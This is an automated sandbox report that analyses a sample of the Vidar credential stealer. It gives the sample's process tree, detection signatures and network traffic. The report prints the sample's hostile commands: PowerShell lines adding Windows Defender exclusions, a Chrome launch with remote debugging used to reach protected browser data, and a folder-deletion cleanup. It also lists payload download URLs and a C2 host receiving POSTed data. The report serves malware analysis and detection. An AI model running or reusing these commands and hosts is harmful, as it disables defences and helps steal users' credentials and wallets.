Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ttok18.exe

Overview

General Information

Sample name:Ttok18.exe
Analysis ID:1568488
MD5:3544b39481484f67f807e54dd58a93d6
SHA1:36691434d2adbb78798bd87090a44e011a4188b8
SHA256:ba979aec878047d3191de74aeed1cb884802da8a1bda6ad8323d5bfae9d528fe
Tags:exeuser-aachum
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Ttok18.exe (PID: 736 cmdline: "C:\Users\user\Desktop\Ttok18.exe" MD5: 3544B39481484F67F807E54DD58A93D6)
    • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2472 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 7300 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 7548 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • 25aac720-4b65-4596-94df-b9a776dc62c7.exe (PID: 8080 cmdline: "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe" MD5: F453C5F8C736FF8C381E7022CAD85E3E)
      • chrome.exe (PID: 5696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2180,i,4947375458311631145,18082190832004734882,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 976 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2176 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • svchost.exe (PID: 2536 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ttok18.exe", ParentImage: C:\Users\user\Desktop\Ttok18.exe, ParentProcessId: 736, ParentProcessName: Ttok18.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", ProcessId: 2472, ProcessName: powershell.exe
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe" , ParentImage: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe, ParentProcessId: 8080, ParentProcessName: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5696, ProcessName: chrome.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ttok18.exe", ParentImage: C:\Users\user\Desktop\Ttok18.exe, ParentProcessId: 736, ParentProcessName: Ttok18.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", ProcessId: 2472, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ttok18.exe", ParentImage: C:\Users\user\Desktop\Ttok18.exe, ParentProcessId: 736, ParentProcessName: Ttok18.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'", ProcessId: 2472, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2536, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T17:04:35.430618+010020442471Malware Command and Control Activity Detected159.69.102.165443192.168.2.449742TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T17:04:37.730347+010020518311Malware Command and Control Activity Detected159.69.102.165443192.168.2.449743TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T17:04:37.730153+010020490871A Network Trojan was detected192.168.2.449743159.69.102.165443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://kresk.lol/%Avira URL Cloud: Label: malware
            Source: https://kresk.lol/aAvira URL Cloud: Label: malware
            Source: https://kresk.lol/Avira URL Cloud: Label: malware
            Source: https://kresk.lolAvira URL Cloud: Label: malware
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeReversingLabs: Detection: 44%
            Source: Ttok18.exeReversingLabs: Detection: 18%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeJoe Sandbox ML: detected
            Source: Ttok18.exeJoe Sandbox ML: detected
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041D1E7 CryptUnprotectData,15_2_0041D1E7
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041FC3B CryptStringToBinaryA,CryptStringToBinaryA,15_2_0041FC3B
            Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 159.69.102.165:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: Ttok18.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: Ttok18.exe
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043A0AE FindFirstFileA,15_2_0043A0AE
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041E359 FindFirstFileA,FindFirstFileA,15_2_0041E359
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00420370 FindFirstFileA,FindFirstFileA,15_2_00420370
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004028FC FindFirstFileA,15_2_004028FC
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042498B FindFirstFileA,FindFirstFileA,15_2_0042498B
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043CE58 FindFirstFileA,15_2_0043CE58
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004390C5 FindFirstFileA,memset,memset,15_2_004390C5
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043B345 wsprintfA,wsprintfA,FindFirstFileA,15_2_0043B345
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00421F18 FindFirstFileA,15_2_00421F18
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00402AA5 FindFirstFileA,15_2_00402AA5
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004214F2 FindFirstFileA,FindFirstFileA,15_2_004214F2
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00439CA9 GetLogicalDriveStringsA,15_2_00439CA9
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Users\user\Desktop\Ttok18.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_011E2309
            Source: chrome.exeMemory has grown: Private usage: 9MB later: 41MB

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49743 -> 159.69.102.165:443
            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 159.69.102.165:443 -> 192.168.2.4:49742
            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 159.69.102.165:443 -> 192.168.2.4:49743
            Source: global trafficHTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 20.233.83.145 20.233.83.145
            Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00418024 InternetReadFile,15_2_00418024
            Source: global trafficHTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kresk.lolConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: t.me
            Source: global trafficDNS traffic detected: DNS query: kresk.lol
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----WB1V3OP8YMYM7YMGD2N7User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kresk.lolContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
            Source: powershell.exe, 00000004.00000002.1760994768.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1812180298.000000000709B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1888125617.000000000780A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 00000004.00000002.1771954716.0000000007E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: svchost.exe, 00000011.00000002.2956329681.000002A458400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 00000011.00000003.2174104393.000002A458618000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 00000011.00000003.2174104393.000002A458618000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 00000011.00000003.2174104393.000002A458618000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 00000011.00000003.2174104393.000002A45864D000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: qmgr.db.17.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
            Source: powershell.exe, 00000004.00000002.1763834008.000000000590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1807167831.00000000058AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
            Source: powershell.exe, 00000004.00000002.1761784248.00000000049F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1775233319.00000000042F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1761784248.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819373125.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.0000000004529000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.1761784248.00000000049F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000006.00000002.1819373125.0000000004329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6LR
            Source: powershell.exe, 00000002.00000002.1775233319.00000000042C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1775233319.00000000042D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1761784248.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819373125.000000000433E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.000000000447B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
